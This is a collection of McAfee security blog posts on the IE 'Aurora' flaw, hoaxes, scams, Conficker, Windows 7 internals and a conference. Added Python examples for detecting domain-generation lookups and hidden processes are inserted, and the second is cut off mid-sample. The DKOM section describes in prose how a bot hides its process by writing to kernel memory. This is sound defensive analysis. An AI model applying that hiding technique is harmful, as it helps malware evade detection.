The Microsoft Internet Explorer vulnerability leveraged in this attack allows for remote code execution, but does require user intervention (such as following a hyperlink to a website, opening an email attachment, etc.).  Furthermore, the single exploit known to exist can be thwarted by Data Execution Prevention (DEP), enabled by default in Internet Explorer 8 and optionally in Internet Explorer 7.  Microsoft lists the following combinations as vulnerable: Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

How are McAfee customers protected from this attack?
McAfee DAT files (antivirus): Coverage will be provided for associated malware (as Exploit-Comele, Roarur.dr, and Roarur.dll) in the 5862 DATs, releasing January 15. Partial coverage is provided in the current (5861) DATs for some components as Generic.dx!kwv, Generic Spy.e, Spy-Agent.ey, and Exploit-Comele.

McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Network Security Platform: The UDS release of January 14 contains the signature “UDS-HTTP: Microsoft Internet Explorer HTML DOM Memory Corruption” which provides coverage.

McAfee Vulnerability Manager: The FSL/MVM package of January 14 includes a vulnerability check to assess if your systems are at risk.

Updated Jan 14
McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts, and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E); proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 16
McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts, and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E); proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 18
McAfee Network Security Platform: Extended coverage is provided in the January 18 UDS release via the “Microsoft Internet Explorer HTML DOM Memory Corruption III” signature. Coverage was originally provided in the UDS release of January 14.

McAfee Application Control: All versions of McAfee Application Control protect against infection, without updates, and will prevent all versions of the “Aurora” attack witnessed to date.

McAfee Firewall Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts. The embedded McAfee AV scanning engine in Firewall Enterprise version 7.0.1.02 and later provides coverage for supported protocols via standard McAfee DAT updates. Coverage for known exploits and associated malware is provided as Exploit-Comele, Roarur.dr, and Roarur.dll in the 5862 DATs, released January 15.

McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

Updated coverage information will be communicated through McAfee Security Advisories:
http://www.mcafee.com/us/threat_center/securityadvisory/signup.aspx

BlackBerry Messenger the new vehicle to distribute Hoaxes?

I received an interesting IM from a friend via BlackBerry Messenger [BBM] this weekend. She was worried that it could do damage to her shiny new BlackBerry and, as she knew I work for McAfee, she forwarded it to me for my opinion.

BlackBerry Messenger Hoax

As soon as I read it, I knew it was a hoax and told her just to delete it.

It didn’t really surprise me that these hoaxes are now being spread via BBM, as the devices are becoming increasingly popular. I’m sure all of you have received the usual one via e-mail about a virus which burns the whole hard disk C: of your computer; well, now I believe you will be seeing them on your BlackBerry.

I don’t want to take the usual route of blaming social networking sites, but I believe they are the cause of this new wave of hoaxes. The problem with social networks is that they enable almost anyone to add you on several different IM services just by visiting your page, if you do not set your privacy settings correctly.

The new BBM also enables you to add new users by taking a picture of a barcode which is uniquely created for your BlackBerry PIN. This makes it incredibly easy for people you don’t know to add you to their contact list, which leaves you open to receiving more hoaxes or spam messages.

I have personally seen lots of these barcodes on several social networks and forums, and I warn those who read this blog not to do the same and to share their PIN only with contacts they trust.

Users should be careful whom they accept as contacts, as you may start to see a lot more of these hoaxes or even spam in your BBM inbox.

W32/Fame

The first malware authors wrote viruses seeking fame through destruction; since then the motivation has shifted to financial gain.

Nevertheless, there are still the ones out there who share the first authors’ intent. I was analysing a simple Trojan today and saw the following message:

Code

It is not uncommon for malware authors to leave messages in their code for Researchers to read.

This one did bring a smile to my face, so the author was rewarded by having it named BackDoor-EKD, which is an increment of one from BackDoor-EKC ;)

Windows 7 – XP Mode

In my last blog we discussed the kernel API refactoring in Windows 7. Today we are going to look at a new feature of Windows 7, XP Mode, which combines virtualization and RemoteApp technologies.
For a quick understanding of Windows XP Mode, let’s look at an excerpt from Wikipedia about its definition: “Windows XP Mode (XPM) is a virtual machine package for Windows Virtual PC containing a pre-installed, licensed copy of Windows XP SP3 as its guest OS. Pre-installed integration components allow applications running within the virtualized environment to appear as if running directly on the host, sharing the native desktop and Start Menu of Windows 7 as well as participating in file type associations. XP Mode applications run in a Terminal Services session in the virtualized Windows XP, and are accessed via Remote Desktop Protocol by a client running on the Windows 7 host. Applications running in Windows XP mode do not have compatibility issues as they are actually running inside a Windows XP virtual machine and redirected using RDP to the Windows 7 host.”
After its successful installation, XPM provides 3 operation modes. You can run Windows XP Mode as a full Windows XP desktop in Enhanced Mode and Basic Mode, which are no different from what you see when you play with a normal Virtual PC product (see the screenshot below; Virtual PC and the XP VM are visible).

Virtual Applications Mode is the third mode. When running in this mode you can launch and run your virtual applications, and they are seamlessly integrated with the Windows 7 desktop and Start menu. In the following screenshot, Virtual PC and the XP VM are not visible, but two virtual applications (TCPView and Process Explorer), which are actually running inside the XP VM, are displayed on the Windows 7 host desktop as if they were running on the host. If you are familiar with VMware, you might find this mode somewhat similar to VMware’s Unity feature, but their internal implementations are not the same.

Because the XP VM is not visible or accessible in Virtual Applications Mode, in order to figure out how a virtual application works we need to publish the TCPView and Process Explorer utilities to the Windows 7 host’s desktop and launch them there. A virtual application is automatically published to the Windows 7 host if its shortcut has been created in the “All Users” profile inside the XP VM (\Documents and Settings\All Users\Start Menu\Programs).

From the TCPView output, we can see that the Windows 7 host doesn’t connect to the XP guest’s Remote Desktop Service directly. Instead it uses the Virtual Machine Guest Service (vmsrvc.exe) running inside the XP guest, which connects locally to port 3389, on which the Terminal Service (termsrv.dll hosted by svchost.exe) listens. The Virtual Machine Guest Service then communicates with the Virtual PC Host Process (vpc.exe) over VPCBus (similar to the VMBus of Hyper-V), a private host-guest communication channel; because no actual inter-VM network is involved, this communication mechanism is fast and efficient. On the host side, the Virtual PC Host Process acts as a named pipe server while another Virtual PC component, Vmsal.exe, acts as its named pipe client and mediates the launching of the virtual application on the host. Through this bidirectional channel between the Windows 7 host and the XP guest, with multiple components involved, the user’s input (keyboard/mouse events) is forwarded to the VM, while the graphics generated in the VM in response to the user’s keystrokes and mouse clicks are packaged and sent back to be presented remotely on the Windows 7 desktop.

From the process tree view below, we know that both TCPView and Process Explorer are running inside a RemoteApp session of the XP VM and are child processes of rdpinit.exe (the RDP shell logon process).

In fact XPM is one application of Microsoft Enterprise Desktop Virtualization (MED-V), which is just one solution in Microsoft’s virtualization family. Other virtualization solutions include Server Virtualization (Hyper-V), Application Virtualization (App-V), and Profile Virtualization (the Folder Redirection and User Profile Roaming features of Windows Vista). I’ll be writing a blog about Microsoft App-V (formerly named SoftGrid) internals soon…

Windows 7 – Kernel API Refactoring

After the public release of Microsoft Windows 7, I saw that many people were curious about and showed great interest in “MinWin”, but most of them were not able to understand or explain it correctly and often confused “MinWin” with “Server Core”. So what exactly does the term “MinWin” mean?
“Server Core” (formerly known as “Server Foundation”), one of Microsoft’s goals for Windows Server 2008, is a variant with a subset of the entire Windows operating system that contains enough components to run various common server roles, such as AD, DNS, DHCP Server and IIS. “MinWin”, on the other hand, is a small, self-contained operating system core that has no dependencies on higher-level components; it is best known as a minimalistic, self-contained set of Windows components and shipped as part of Windows 7.
One Microsoft Windows developer describes “MinWin” as “refactoring code along architectural layering lines”. Starting with Windows Vista (some of the componentization and refactoring work already shipped with Windows Vista, which is arguably the first “MinWin”-based operating system), every component of the operating system was assigned a “layer number” that represents its dependency position relative to other components, with lower-numbered components being closer to the core of the operating system. The core architecture team then had to do “code refactoring” to resolve the dependency issues where low-level components relied on high-level components. Next let’s look at how this “layering” and “code refactoring” are implemented in Windows 7 using an example.

From the screenshot above (kernel32.dll opened in the Dependency Walker utility), we can see that Windows 7 introduces a set of new DLL files which export many well-known Win32 APIs. The newly introduced DLLs include kernelbase.dll (Windows NT BASE API Client DLL) and 34 hidden ApiSet stub DLLs (listed below), and each such stub DLL belongs to a separate function category, as its name indicates. For example, api-ms-win-core-processthreads-l1-1-0.dll exports process/thread-related APIs (CreateProcessA/W, CreateRemoteThread etc.), and api-ms-win-core-heap-l1-1-0.dll exports user-mode heap management APIs (HeapCreate, HeapAlloc etc.).

ApiSet Stub DLLs:
api-ms-win-core-console-l1-1-0.dll
api-ms-win-core-datetime-l1-1-0.dll
api-ms-win-core-debug-l1-1-0.dll
api-ms-win-core-delayload-l1-1-0.dll
api-ms-win-core-errorhandling-l1-1-0.dll
api-ms-win-core-fibers-l1-1-0.dll
api-ms-win-core-file-l1-1-0.dll
api-ms-win-core-handle-l1-1-0.dll
api-ms-win-core-heap-l1-1-0.dll
api-ms-win-core-interlocked-l1-1-0.dll
api-ms-win-core-io-l1-1-0.dll
api-ms-win-core-libraryloader-l1-1-0.dll
api-ms-win-core-localization-l1-1-0.dll
api-ms-win-core-localregistry-l1-1-0.dll
api-ms-win-core-memory-l1-1-0.dll
api-ms-win-core-misc-l1-1-0.dll
api-ms-win-core-namedpipe-l1-1-0.dll
api-ms-win-core-processenvironment-l1-1-0.dll
api-ms-win-core-processthreads-l1-1-0.dll
api-ms-win-core-profile-l1-1-0.dll
api-ms-win-core-rtlsupport-l1-1-0.dll
api-ms-win-core-string-l1-1-0.dll
api-ms-win-core-synch-l1-1-0.dll
api-ms-win-core-sysinfo-l1-1-0.dll
api-ms-win-core-threadpool-l1-1-0.dll
api-ms-win-core-util-l1-1-0.dll
api-ms-win-core-xstate-l1-1-0.dll
api-ms-win-security-base-l1-1-0.dll
api-ms-win-security-lsalookup-l1-1-0.dll
api-ms-win-security-sddl-l1-1-0.dll
api-ms-win-service-core-l1-1-0.dll
api-ms-win-service-management-l1-1-0.dll
api-ms-win-service-management-l2-1-0.dll
api-ms-win-service-winsvc-l1-1-0.dll

Here we can see clearly that Kernel32!OpenProcess actually does little work: it simply jumps to OpenProcess_0, which is imported from one of the stub DLLs (api-ms-win-core-synch-l1-1-0.dll).

IDA Pro and Dependency Walker show this dependency explicitly. However, when we look further into the disassembly of api-ms-win-core-synch-l1-1-0!OpenProcess, we are surprised to find that the function is actually an empty function which just returns 0, and all of the DLL’s exported functions with 3 arguments share the same function stub (see the screenshot below). So how does Kernel32!OpenProcess work properly if it is resolved to an empty function?

The secret lies in the DLL loading process. The WinDbg debugging output tells us that Kernel32!OpenProcess does not jump to api-ms-win-core-synch-l1-1-0!OpenProcess at runtime; the import table entry for OpenProcess is actually filled with the address of Kernelbase!OpenProcess, and the api-ms-win-*.dll files are never loaded into the process address space (refer to the !peb output).

The real implementation code was moved from Kernel32!OpenProcess to Kernelbase!OpenProcess (see below), which in turn invokes Ntdll!ZwOpenProcess. In fact, not only OpenProcess but most Win32 APIs have undergone the same “refactoring along architectural layering lines”.

In my next blog on Windows 7 internals we are going to look inside a cool feature of Windows 7, “XP Mode”; please stay tuned.

No More Dragons: the 26th Chaos Communication Congress Ends

With a dazzling laser show, the 26th Chaos Communication Congress (26c3) in Berlin, the last big security conference of 2009, has ended. If you haven’t been here, you might have missed fewer of the sessions than people on site, thanks to the worldwide availability of live streams (and recordings). What you did miss was meeting all these people, though!

26c3 has simply outgrown the location it has occupied for the last few years, but this may be offset by a very successful experiment: allowing full remote access to the conference network via VPN for those who couldn’t attend. Other conferences should consider this (hey, Defcon team, are you reading this? ;) ) as well, especially as air travel becomes less and less attractive.

During the last two days a number of the talks were on GSM security (Harald Welte, Dieter Spaar) and tracking phones (L. Aaron Kaplan). In case you missed Dan Kaminsky’s “Black Ops of PKI” earlier this year, we had another chance. Just before the closing ceremony, Frank Rieger and Ron repeated their session “Security Nightmares” for the 10th time.

Security Nightmares was an entertaining, though a bit scary, summary of this year’s security issues and incidents, and a look at the future coupled with a wish list. Most notably, they’d like to see personal liability of executive management for the misuse of data. They call for a law for all companies to inform a customer or contact once a year about the personal data they have, what they did with it, and whom they shared it with or sold it to. The speakers repeatedly outlined the problem of data that people put online about themselves and their friends. Because pretty much all data leaks to the general public sooner or later, we need to take the utmost care when determining what to put online.

My personal rule: Don’t put anything online if you don’t want to see it on the front page of a newspaper.

I’ll finish with a quote from Security Nightmares (though I think it’s originally from Bruce Schneier): “Data is the pollution [problem] of the information age.” There’s something to think about when all the New Year’s Eve parties are over. Have a happy and secure 2010!

Fake Alert Uses McAfee-like Domain Name to Attract Victims

Cybercriminals love to use social engineering techniques to trick users into installing their malware. One of the latest fake-alert variants attempts to trick users into believing the software is related to or hosted by McAfee: mcafeevirusremover.com.

With DAT release 5835 (December 17) McAfee detects the HTML code for the domain as FakeAlert-KW!htm and the associated Trojan as FakeAlert-KW. The script hosted by the domain can attack the Windows browsers Internet Explorer, Mozilla SeaMonkey, and Chrome. The script also affects browsers on Linux platforms.

This fake-alert variant is hosted on at least 13 other known domains. McAfee’s TrustedSource blocks the IP addresses and the domains (including DNS and mail servers) associated with this Trojan. For example:

TS Screenshot

The infection begins by redirecting the victim to the domain hosting the Trojan script code. This website is designed to look like Windows Explorer in Windows XP. It “reports” multiple infections on the victim’s computer:

Domain screenshot

If the user clicks anything within the browser, the FakeAlert-KW Trojan will download. Once it is installed, the Trojan offers a graphical interface designed to appear as a legitimate security application reporting multiple infections on the victim’s computer:

Screenshot01

Screenshot02

Infected machines will also suffer a barrage of pop-up balloons from the System Tray warning of various problems that require the user to register the software for a fee to “clean” the system:

Screenshot05

Screenshot03

Remember to update your McAfee products to ensure you are protected from these threats.

Dragons Everywhere: The 26th Chaos Communication Congress, Part 2

Day 2 and Night 2 of the 26th Chaos Communication Congress are over, so it’s time for a short update on what you are missing here.

This year the Congress is organized as a distributed event: Many local Hacker Spaces have joined the network at Berlin Conference Center, giving access to resources and talks to visitors. Check out the Dragons Everywhere Wiki at 26c3 for more info. And of course there are still the live streams of the talks available.

One highlight was certainly an update on the current debate around the Vorratsdatenspeicherung (“data retention”). CCC spokesperson Constanze Kurz expects a favorable ruling against the current laws by the highest German court. This may have an EU-wide impact.

At the same time (and thank goodness there were streams available!) was Collin Mulliner’s talk about fuzzing smart phones and some of his (and Charlie Miller’s) findings.

Felix “FX” Lindner changed sides: in a talk covering defense instead of breaking things, he demonstrated the security problems that come with Flash and released Blitzableiter (“lightning rod”), a tool for sandboxing .swf files to prevent a class of Flash exploits. His tool is still a work in progress but looks very promising already.

And to finish the day there was the Phonoelit Party at c-base, featuring Mumpi, Vela, and Illo. Another great event!

Of course, this selection is just my personal preference. Make sure to check the schedule for talks that interest you. ;)

Here Be Dragons: The 26th Chaos Communication Congress, Part 1

Although most people enjoy the days between Christmas and New Year’s Eve with their families, hackers, geeks, security enthusiasts, and privacy activists meet in Berlin for the world’s oldest and Europe’s biggest annual hacker conference. Now in its 26th year (I was a 13-year-old kid, trying to figure out what to do with a Sharp 1211, when it started), the schedule is quite heavy with political topics, not surprising after a year full of very controversial laws and initiatives. There is so much content that some of the really good tech sessions have been reduced to four-minute “lightning” talks! Check Xonox’s talk on sniffing AES encryption via the CPU cache for a great example.

If you’re not here already, don’t bother to come: The conference is sold out completely. Day tickets will be available at 8 a.m. but it will take only minutes for those to disappear, so instead you might follow the live streams. Actually many people at the con follow them because the rooms are full, sometimes 15 minutes before the talk starts! Like Defcon at the original Alexis Park location, CCC has outgrown its home at the Berlin Conference Center and needs a new location.

For a first conference highlight: Fabian “fabs” Yamaguchi’s talk about various network-related design errors is a must-see. Collin Mulliner’s and FX’s talks are two I wouldn’t want to miss.

Ok, I’m heading over to the event. You enjoy your holiday! ;)

2010 Predictions: the Year of a Major Social Networking Security Breach?

With the New Year just days away, it’s time for McAfee Labs 2010 Threat Predictions. What should you be wary of in the coming year? Social networks.

Sites such as Twitter and Facebook have changed the way we communicate, interact, and share on the web. As user bases for the top online social destinations reach record highs, cybercriminals are building out their criminal toolkits, taking advantage of new technologies, third-party applications, and hotspots of activity to exploit users.

What does this mean for the average surfer? Next time you receive an invite from one of your “Facebook friends” to play a game that looks like it’s shaping up to be the next Farmville, think twice before you click. In 2010, users are going to be more vulnerable to attacks that blindly distribute fake apps across their networks. The same goes for bit.ly and TinyURL links. As abbreviated URLs become more ubiquitous, it will be even easier for cybercriminals to mask and direct users to malicious sites.

Speaking of ubiquity: McAfee Labs predicts that Adobe will overtake Microsoft as the No. 1 target for cybercriminals in 2010. Adobe products—in particular Acrobat Reader and Flash—have become two of the most widely used apps in the world, and cybercriminals go where the masses go. Cybercriminals will have a field day preying on people using Adobe software.

McAfee also believes the following will play a critical role in 2010:

  • Banking Trojans will become even more sophisticated. They showed some firepower in 2009—easily getting around current protections used by banks—but next year they will reach a new level with the ability to interrupt legitimate transactions and make unauthorized withdrawals, while flying under the radar.
  • Malware via email attachments will increase, especially targeting corporations, journalists, and individuals
  • Botnets, the infrastructure that launches nearly every type of cyberattack, will adopt a peer-to-peer architecture, connecting computer to computer without a centralized control point—making it more difficult for cybersecurity professionals to detect them
  • HTML 5 and the evolution of the programming language will give cybercriminals new opportunities to write malware and prey on users

Countering these trends, in 2010 McAfee predicts a good year for law enforcement and the ability to identify, track, and combat cybercrime worldwide. After a decade of cybersecurity research, coordination, and training undertaken by agencies across the globe, the community will reap the benefits of the effort put forth over the past ten years.

McAfee Labs serves up the details on its threat predictions in the full report. Surf the web cautiously in 2010!

(We must correct one oversight: Our colleague Pedro Bueno was one of the authors of the report. His name was inadvertently left off the document. Thanks, Pedro!)

(Not So) Happy Holidays from Koobface

Koobface has been busy. Activities associated with the worm have increased during the month of December. Often the activity is sending traffic to compromised servers to obtain more servers. Other times it uses those compromised servers to proxy users to malicious domains that distribute more malware or take control of the infected machines.

This morning we noticed a trend: some of the domain-based locations are making use of the holiday theme. This has included everything from “presents for your pets” to “festive holiday trees.” These are domains that appear legitimate but are not. In fact, many of the domains were legitimate at one point but are now serving a different purpose.

Holiday Koobface Greetings

When users go to these happy holiday sites, they are greeted by having files downloaded to their computers. Then they receive the gift of holiday identity theft!

We have monitored the progress of this attack and its spread throughout the day. Based upon past trends we expect it to continue to evolve and find new servers and methods with similar associations over the next few weeks.

Spread of Koobface Holiday Cheer

Stay updated and safe over the holidays!

Hacker’s Holiday: a Viral Video!

Ketchup stains. Klingons. Exploding monitors. They’re all part of our fiendishly clever new music video, “Hacker’s Holiday.” Pity poor Tiny Tim. He gets a shiny new PC for Christmas and doesn’t bother to protect it. Well, you can guess the rest. A few short days later (12 days maybe?) his PC is ready for the ashcan of history. But how will Tiny Tim exact his revenge? Watch and learn:

And yeah, that’s one guy doing all the sounds, all the singing, all the work. Mister Tim, also star of Enter Kazoo Man and the composer of Star Wars (John Williams is the Man) wrote this little ditty with our help.

If you like it, star it and share it. Thanks! And Happy Holidays from McAfee.

Check Your Friends! Facebook IMs May Lead To Trouble

I ran into a few strange IMs over the weekend. When I was not shoveling out my driveway from the 15 inches of snow that covered it I was logged into Facebook telling people about it…. It was then that I started receiving some VERY interesting IMs from a friend extolling the virtues of a clean colon (yep – you read that right):

Colon Cleanse IM

This led to the following questionable site, which had some very interesting comments on our SiteAdvisor site:

Colon Cleanse Website

In short order I also received two more IMs. The first was a video (sound familiar???):

Facebook Video IM

This led to a pretty darn good fake Facebook login page (note the SiteAdvisor warning on that page!):

FaceBook Phishing Page

The address this page was hosted on also had a VERY malicious reputation rating from our TrustedSource technology:

TrustedSource Rep Page

Last but not least I got one that included sales pricing for Christmas!!! It is the holidays and scammers certainly like using seasonal trends:

Christmas IM Scam

This led to a really well done “replicas” site with brands such as Rolex, Tiffany, Breitling and others:

Fake Watch Site

I contacted my friend (who was certainly NOT sending the IMs knowingly) and got them fixed up pretty quickly. Not surprisingly, it was a Koobface variant on the local machine they were logging into Facebook from.

Facebook is one of the greatest and most popular sites on the Internet today. It has a huge user base, and as such is heavily targeted by scammers and malware writers. Make sure the computer you are accessing it from has up-to-date and properly configured security software!

Brittany Murphy Searching Dangers

Sadly, actress Brittany Murphy passed away over the weekend. With her unfortunate passing will come the inevitable web searches that lead Internet users to some potentially unsafe sites. This has been a well established trend throughout 2009. It is a sad reflection that malware authors and scammers will use these events as lures to distribute their warez and site links.

Over the weekend I first started seeing tweets relating to Brittany Murphy and began capturing images and running some searches. Very quickly these led to the expected results:

Brittany Murphy SA Result

The SiteAdvisor warning page on it is pretty clear on its intentions:

Brittany Murphy SiteAdvisor Warning Page

Some of the search phrases that are yielding very questionable results are:

  • Brittany Murphy dies
  • Brittany Murphy dead
  • Brittany Murphy husband
  • Brittany Murphy death hoax
  • Ashton Kutcher Brittany Murphy
  • Brittany Murphy 8 mile
  • Brittany Murphy luanne

Some of these had more than half the results on the first Google search page as flagged yellow or red by our SiteAdvisor technology.

The bad guys have been using celebrity deaths and natural disasters as a successful lure for most of this year. The words “Brittany” and “Murphy” along with related event words are trending very high in Google Trends and Tweetcloud currently. This means the bad guys will be using it as a lure because users are already searching for information on the subject. Make sure you are aware of the trend and stay one step ahead of them! Use SiteAdvisor and search safely!!

Conficker Again in the News, Part 2

Yesterday, my colleague Dave Marcus quoted for you the new graphs and stats posted by Shadowserver. Indeed, since November 2008, W32/Conficker (alias Downup, Downadup, Kido) has frequently made headlines. This computer worm has five main variants, which have appeared during the last year. Wikipedia lists the dates: 

  • A variant: First appeared 21 November 2008
  • B variant: First appeared 29 December 2008
  • C variant: First appeared 20 February 2009
  • D variant: First appeared 4 March 2009
  • E variant: First appeared 7 April 2009  (self-destruction on 3 May 2009)

W32/Conficker spreads via the Windows AutoRun feature, drive sharing, and Microsoft vulnerabilities. At the end of 2008, the A and B versions took advantage of a newly discovered Windows Remote Procedure Call service vulnerability (MS08-067). That’s how Conficker’s masters created a large botnet involving one million unique IPs on a daily basis. The worm used a date-based algorithm to generate 250 domains per day under generic top-level domains. Infected machines then attempted to contact one of these domains in order to install specific malware.

In a similar manner, hosts infected with the C variant generated 50,000 unique URLs ending with a country-code top-level domain and attempted to connect to the first URL that was ready to distribute a digitally signed payload. This third variant also contained peer-to-peer functionality.
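An added example (not code from the McAfee post or from Conficker itself) of the detection logic the two paragraphs above suggest to a defender: a host working through hundreds of generated domains a day gets NXDOMAIN for almost all of them, so its distinct failed lookups per day stand out in resolver logs. The log format, client addresses, domain names and the threshold of five are all constructed assumptions for this example.

```python
import math
from collections import defaultdict

# Constructed resolver log, one query per line: "<date> <client> <name> <rcode>".
# The addresses and domain names are made up for this example.
SAMPLE_LOG = """\
2009-11-30 10.0.0.5 www.example.com NOERROR
2009-11-30 10.0.0.5 exmaple.com NXDOMAIN
2009-11-30 10.0.0.5 update.example.org NOERROR
2009-11-30 10.0.0.9 www.example.com NOERROR
2009-11-30 10.0.0.9 qxzkvbtrwp.info NXDOMAIN
2009-11-30 10.0.0.9 hjwrtlknqaz.biz NXDOMAIN
2009-11-30 10.0.0.9 mbvcxzlkjh.org NXDOMAIN
2009-11-30 10.0.0.9 pqwoeirutyal.net NXDOMAIN
2009-11-30 10.0.0.9 zxnmqwerpl.com NXDOMAIN
2009-11-30 10.0.0.9 qxzkvbtrwp.info NXDOMAIN
2009-12-01 10.0.0.9 ytrewqlkjhg.org NXDOMAIN
"""


def parse_log(text):
    """Turn the log text into (date, client, name, rcode) tuples."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        date, client, name, rcode = line.split()
        records.append((date, client, name.lower().rstrip("."), rcode))
    return records


def second_level_label(name):
    """'qxzkvbtrwp.info' -> 'qxzkvbtrwp': the part a generator actually chooses."""
    parts = name.split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def label_entropy(label):
    """Shannon entropy (bits per character) of a label; random strings score high."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def suspicious_clients(records, min_nxdomain=5):
    """Map (client, date) -> (distinct NXDOMAIN names, mean label entropy) for
    every client/day pair that reaches min_nxdomain distinct failed lookups.

    A single typo (exmaple.com) stays below the threshold; a generator that
    walks through its daily domain list does not. The threshold is an
    assumption for this example, not a published Conficker signature."""
    failed = defaultdict(set)
    for date, client, name, rcode in records:
        if rcode == "NXDOMAIN":
            failed[(client, date)].add(name)
    flagged = {}
    for key, names in failed.items():
        if len(names) >= min_nxdomain:
            mean_entropy = sum(label_entropy(second_level_label(n)) for n in names) / len(names)
            flagged[key] = (len(names), round(mean_entropy, 2))
    return flagged


if __name__ == "__main__":
    for (client, date), (count, entropy) in suspicious_clients(parse_log(SAMPLE_LOG)).items():
        print(f"{date} {client}: {count} distinct NXDOMAIN names, mean label entropy {entropy}")
```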

The D and E variants were not so prolific; they helped spread the C version as well as other malware (W32/Waledec) and fake anti-virus software.

Estimating the size of the Conficker population is almost impossible. In January, a 10-million hosts figure was frequently quoted in the media. McAfee announced one million unique IPs were alive (or online) each 24 hours, while another security company claimed that at least one out of every 16 PCs worldwide was infected. In March another source said that more than 35 million unique IPs had been botnet zombies since November 2008.

Today the A, B, and C variants maintain a huge foothold worldwide. In October, researchers estimated the number of systems infected topped seven million. Following Dave’s advice, I visited the new Shadowserver statistics page. To illustrate the extent of how this malware affects the world, the organization monitored the Autonomous System Number blocks that have at least one Conficker IP in their network space. The charts highlight the widespread infection and propagation as well as the ratio of infected IP addresses for each autonomous system block.

Shadowserver names 183 country codes and 5994 autonomous systems with Conficker IPs in their network space:

  • 1086 for the Russian Federation (RU)
  • 597 for the United States (US)
  • 422 for Ukraine (UA)
  • 271 for Romania (RO)
  • 244 for Brazil (BR)
  • 243 for Republic of Korea (KR)
  • 184 for Poland (PL)
  • 166 for Bulgaria (BG)
  • 147 for Europe (EU)
  • 129 for Indonesia (ID)
  • 113 for Japan (JP)
  • 95 for China (CN)
  • 94 for India (IN)

You can also find a Top 500 list for the autonomous systems hosting the largest number of infected IPs as well as the percentage of their entire routed space that is affected by the worm. CHINANET and CHINA169 take the top positions, but with only 1.1 percent and 1.2 percent of unique aggregate IPs. In the 420th position, we discover that 26.36 percent of CHILE S.A.’s routed space is affected by the worm.

If you want to know how your autonomous systems or your country-code top-level domain are positioned, check out the Shadowserver website.

We don’t really know the objectives of Conficker attacks, even though we can guess the motivations are financial. The consensus in the security community is that it was created to make botnets for hire. The botnet can be rented to criminals who want to send spam, distribute rogue spyware products, steal credentials, and direct users to online scams and phishing sites.

In May, Mike Steward from the Canadian Internet Registration Authority suggested that in the worst case Conficker could become a powerful weapon for cyberwarfare that could disrupt not just countries, but the Internet itself.

Conficker Again in the News

Our good friends at Shadowserver have recently added some excellent graphs and stats that highlight the continued infections and propagation by the Conficker worm.

Conficker, although it actually does very little, continues to be a major annoyance worldwide, so let’s use these excellent charts and graphs as a reason to revisit two important points:

  • Update your systems to current patch levels
  • Use up-to-date and properly configured security software. Deploy these at a variety of levels whenever possible. (Layers of defense work better than a single solution.)

Take these two steps and you will be protected against Conficker and a whole lot more. Threats are complex, and combating them really does take layers of defense along with appropriate security technologies. In this age of “blended” and “Web 2.0” threats, it is wise to incorporate host IPS, network IPS, reputational technologies, and cloud technologies.

The bad guys are always looking for new ways to make their malware and attacks more successful. The good news is we are always working on new technologies to make them less successful.

DKOM Opens Door to Malware Rootkits

Much malware comes with a kernel rootkit component. Subverting the Windows kernel is indeed the best way to conceal malicious activities on infected systems. To achieve this, many types of malware load malicious device drivers that enjoy full access to all kernel objects. However, this technique is somewhat noisy, and loading a new driver is not really stealthy.

At McAfee Labs we recently ran across a W32/IRCBot.gen.ac sample that uses Direct Kernel Object Manipulation (DKOM) to hide itself without loading a new driver. This technique seems impossible at first sight because modifying kernel memory pages from userland is not allowed. However, W32/IRCBot.gen.ac takes advantage of an undocumented function exported by ntdll.dll that provides debugging functionalities at the kernel level.

NtSystemDebugControl(), despite being undocumented, has been known for many years. It provides simple functions such as reading from and writing to any location within the kernel memory. And this is exactly what a piece of malware needs to manipulate kernel objects.

W32/IRCBot.gen.ac starts by checking what version of Windows it’s running on. This technique won’t work under Windows Vista or Windows 7. If the infected machine is not running Windows XP, W32/IRCBot.gen.ac gives up and doesn’t try to hide itself.

If it does find Windows XP, W32/IRCBot.gen.ac opens the current process’ token to ensure it has the SeDebugPrivilege, which is required to call NtSystemDebugControl().

To find the process list in the kernel memory, W32/IRCBot.gen.ac retrieves the address of the global variable PsInitialSystemProcess, which points to the EPROCESS structure of the system process.

W32/IRCBot.gen.ac can now find the process list in memory and go through it to find its own process. It then removes itself from the process list by calling NtSystemDebugControl() to write to kernel memory.

The malicious process is no longer visible in the Windows Task Manager or other tools such as Process Explorer. However, monitoring TCP connections will quickly reveal the presence of an offending process whose name can’t be found.

Rootkit Detective also detects processes hidden via DKOM.
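One way to apply the cross-view check described above (a process unlinked from the kernel list still owns sockets that carry its PID), as an added example rather than code from the McAfee post or from Rootkit Detective: parse the process list Task Manager sees and the TCP table, and report connections whose owning PID is not in the list. The two snapshots are constructed text in the shape of `tasklist` and `netstat -ano` output; the PIDs, names and addresses in them are made up.

```python
import re

# Constructed snapshots in the shape of `tasklist` and `netstat -ano` output on
# Windows XP. The PIDs, addresses and names are made up for this example; PID
# 1732 stands in for a process that has been unlinked from the process list.
TASKLIST_SNAPSHOT = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System Idle Process              0 Console                    0         28 K
System                           4 Console                    0        236 K
svchost.exe                    912 Console                    0      4,212 K
explorer.exe                  1488 Console                    0     18,904 K
iexplore.exe                  2044 Console                    0     31,556 K
"""

NETSTAT_SNAPSHOT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
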